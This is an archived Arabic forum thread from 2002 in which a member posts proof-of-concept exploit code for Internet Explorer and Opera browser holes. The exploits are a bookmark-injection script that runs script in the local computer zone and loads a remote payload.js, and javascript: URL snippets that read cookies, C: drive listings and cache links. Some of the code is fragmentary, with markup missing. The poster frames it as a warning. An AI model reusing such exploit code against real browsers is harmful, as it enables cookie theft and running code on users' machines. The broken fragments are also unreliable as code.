الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

تفاصيل ثغرتي IE و Opera :)

مغلق
بدأه محمد قطان في 9 يونيو 2002 · 1 رد · 391 مشاهدة · في منتدى الشبكات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

انتشرت مؤخرا ثغرتين خطيرتين في كلا المتصفحين IE و Opera ..

ولعل المتابع لمواقع السيكيورتي الشهيرة يلاحظ انهم لم يقدموا معلومات وافية حول هذه الثغرات وخاصة ثغرة IE وهذا يتبع لسياسات أمنية ...

طبعا حذرنا سابقا من هذه الثغرة في هذا الموضوع :

injectCookie() step 1.

';

document.write(s);

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

METHOD: Favorite/bookmark based script execution

IMPACT: Scripting in local computer zone.

PATCH: NONE

NOTE: - This exploit is designed for Win 98/ME. In order

to work on win 2000/XP username must be known.

Please change bookmarkFile and scriptFile.

- Use the same payload.js as in the exploit

"Cookie based script execution".

----------------------------------------------------------------

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

<script>

//bookmarkFile = "c:/DOCUME~1/ADMINI~1/favorites/unique.url";

//bookmarkFile = "c:/windows/favorites/unique.url";

//scriptFile = "http://www.microsoft.com/unique/payload.js";

function injectBookmark(){

code = '<script>document.scripts[0].src="';

code += scriptFile+'"<'+'/script><'+'/html>';

window.external.AddFavorite('http://'+code,'unique');

}

function loadBookmark(){

alert("*** Loading bookmark file! ***");

document.location="file:///"+bookmarkFile+"."; // the important dot!

}

injectBookmark() step 1.

width=0>



Read google cookie

Read c:/ structure (win)

Read links in cache

<script>
function readCookie(){
cookie.location="java script:alert(document.cookie)";
}
function readFiles(){
t = 'java script:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
t = 'java script:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}

------------------- CUT HERE -----------------------------------

EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be
done using the frame tag instead. The following exploit has been tested on
Opera 6.01, 6.0, 5.12 (win).
------------------- CUT HERE -----------------------------------








------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
Google
cookie

First
item in cache


First
file/directory in c: (win)

------------------- CUT HERE -----------------------------------

أرجو ان تقرؤها بعناية وتستفيدوا منها في الحذر من كثير من المواقع التي فعلا بدأت تستخدم هذه الثغرة لأغراض تجسسية او لا انسانية ...:( :(

لكم تحياتي .. (f)

واثق الخطوة يمشي ملكا !!

#2

تسلم يدينك يا حلو

الله لا يحرمنا منك

هذا الموضوع مغلق.

مواضيع مشابهة